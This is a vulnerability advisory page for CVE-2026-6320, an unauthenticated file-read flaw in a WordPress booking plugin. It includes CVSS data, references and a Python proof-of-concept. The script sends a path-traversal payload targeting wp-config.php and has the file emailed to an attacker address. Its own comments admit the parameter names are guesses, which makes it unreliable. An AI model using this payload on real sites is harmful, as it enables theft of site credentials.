CVE-2026-6320

Description

The Salon Booking System – Free Version plugin for WordPress is vulnerable to Arbitrary File Read in versions up to, and including, 10.30.25. This is due to the public booking flow accepting attacker-controlled file-field values and later using those stored values as trusted paths for email attachments. This makes it possible for unauthenticated attackers to read arbitrary local files and exfiltrate them via booking confirmation email attachments.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Salon Booking System <= 10.30.25

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # Target URL (replace with actual target) target_url = "http://example.com/wp-admin/admin-ajax.php" # Attacker controlled email to receive the exfiltrated file attacker_email = "[email protected]" # Path traversal payload to read sensitive file # Payload attempts to read wp-config.php file_path_payload = "../../../../../../../../wp-config.php" # Data payload based on the vulnerable booking flow parameters # Note: Parameter names (e.g., 'action', 'booking_data') need to be confirmed via specific plugin analysis payload = { "action": "sbs_booking_submit", "sbs_email": attacker_email, "sbs_file_field": file_path_payload # The vulnerable parameter accepting the path } try: response = requests.post(target_url, data=payload) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check the attacker's email inbox for the attachment containing the file content.") else: print("[-] Request failed.") except Exception as e: print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6320
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6320
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6320/
[4] VulDB https://vuldb.com/cve/CVE-2026-6320
[5] https://plugins.trac.wordpress.org/changeset/3512110/salon-booking-system
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/e91b8082-e1c7-4989-82db-20e255b52854?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6320", "sourceIdentifier": "[email protected]", "published": "2026-05-02T12:16:16.750", "lastModified": "2026-05-05T19:15:34.330", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Salon Booking System – Free Version plugin for WordPress is vulnerable to Arbitrary File Read in versions up to, and including, 10.30.25. This is due to the public booking flow accepting attacker-controlled file-field values and later using those stored values as trusted paths for email attachments. This makes it possible for unauthenticated attackers to read arbitrary local files and exfiltrate them via booking confirmation email attachments."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3512110/salon-booking-system", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e91b8082-e1c7-4989-82db-20e255b52854?source=cve", "source": "[email protected]"}]}}